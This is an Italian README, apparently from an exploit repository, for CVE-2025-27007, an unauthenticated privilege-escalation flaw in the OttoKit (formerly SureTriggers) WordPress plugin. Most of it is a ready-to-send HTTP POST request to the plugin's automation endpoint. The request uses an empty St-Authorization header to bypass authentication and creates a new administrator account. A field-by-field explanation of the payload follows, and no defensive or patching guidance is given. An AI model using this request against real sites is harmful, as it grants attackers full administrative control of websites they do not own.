
sfruttando CVE-2025-27007, una vulnerabilità critica di escalation dei privilegi non autenticata nel plugin WordPress OttoKit (ex SureTriggers)
Sfruttamento di CVE-2025-27007, una vulnerabilità critica nell'escalation non autorizzata dei privilegi nel plugin OttoKit (precedentemente noto come SureTriggers) per WordPress. Questo repository illustra come un attaccante può creare un account amministratore su un sito WordPress vulnerabile.
La vulnerabilità può essere sfruttata nelle seguenti circostanze:
La seguente richiesta ha come destinazione l'endpoint /wp-json/sure-triggers/v1/automation/action per creare un account amministratore:
POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [sito-target]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [lunghezza]
selected_options[user_name]=new_admin&selected_options[user_email][email protected]&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
Endpoint: POST /wp-json/sure-triggers/v1/automation/action
St-Authorization: (vuoto): Aggira l'autenticazione quando il plugin non è configurato.
selected_options[user_name]: Nome utente per il nuovo account (ad esempio, new_admin).
selected_options[user_email]: Email per il nuovo account (ad esempio, [email protected]).
selected_options[password]: Password per il nuovo account (ad esempio, StrongP@ssw0rd123).
selected_options[role]: Impostato su amministratore per concedere privilegi completi.
type_event: Impostato su create_user_if_not_exists per attivare la creazione dell'utente.